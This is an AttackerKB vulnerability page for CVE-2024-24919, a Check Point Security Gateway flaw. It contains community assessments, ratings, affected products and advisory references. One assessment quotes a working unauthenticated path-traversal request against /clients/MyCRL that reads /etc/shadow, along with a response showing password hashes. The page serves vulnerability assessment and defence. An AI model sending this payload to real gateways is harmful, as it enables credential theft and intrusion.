Very High
CVE-2024-24919
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2024-24919
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityHigh
Technical Analysis
On May 28, 2024, Check Point published an advisory for an unauthenticated information disclosure vulnerability affecting Check Point Security Gateway devices configured with either the “IPSec VPN” or “Mobile Access” software blade. This vulnerability was stated as being a vulnerability impacting devices with password-only authentication enabled on some accounts. However, upon analysis, CVE-2024-24919 was discovered to be an unauthenticated arbitrary file read as root. Though attackers may steal credential files to crack account password hashes, CVE-2024-24919 also impacts systems that are not configured for password-only authentication.
This vulnerability should be urgently addressed by anyone running a Check Point Security Gateway with the IPSec VPN or Mobile Access blades enabled. Additionally, organizations should reference the Rapid7 blog post for this vulnerability for remediation and detection recommendations. As of May 30, 2024, CVE-2024-24919 has been added to CISA’s KEV catalog.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
This is trivial to exploit. The vulnerability at its core is a directory traversal vulnerability that allows for full access to files on the Check Point VPN device/service. It also appears that this an unauthenticated vulnerability and given that these servers will by their very nature be publicly exposed, significantly increases the risk of this vulnerability.
Exploit
The exploit itself, as mentioned above is trivial to exploit. An example is shown on https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/:
Request
POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow
Response
HTTP/1.0 200 OK Date: Thu, 30 May 2024 01:38:29 GMT Server: Check Point SVN foundation Content-Type: text/html X-UA-Compatible: IE=EmulateIE7 Connection: close X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 505 admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8::: monitor:*:19872:0:99999:8::: root:*:19872:0:99999:7::: nobody:*:19872:0:99999:7::: postfix:*:19872:0:99999:7::: rpm:!!:19872:0:99999:7::: shutdown:*:19872:0:99999:7::: pcap:!!:19872:0:99999:7::: halt:*:19872:0:99999:7::: cp_postgres:*:19872:0:99999:7::: cpep_user:*:19872:0:99999:7::: vcsa:!!:19872:0:99999:7::: _nonlocl:*:19872:0:99999:7::: sshd:*:19872:0:99999:7:::
Using this, an attacker would be able to gain access to sensitive data on the server, such as the configuration for the VPN service.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- checkpoint
Products
- cloudguard network security r80.40,
- cloudguard network security r81.0,
- cloudguard network security r81.10,
- cloudguard network security r81.20,
- quantum security gateway firmware r80.40,
- quantum security gateway firmware r81.0,
- quantum security gateway firmware r81.10,
- quantum security gateway firmware r81.20,
- quantum spark firmware r80.20,
- quantum spark firmware r81.10
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this report- Vendor Advisory (https://support.checkpoint.com/results/sk/sk182336)
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2024/05/30/cisa-adds-two-known-exploited-vulnerabilities-catalog)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Miscellaneous
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: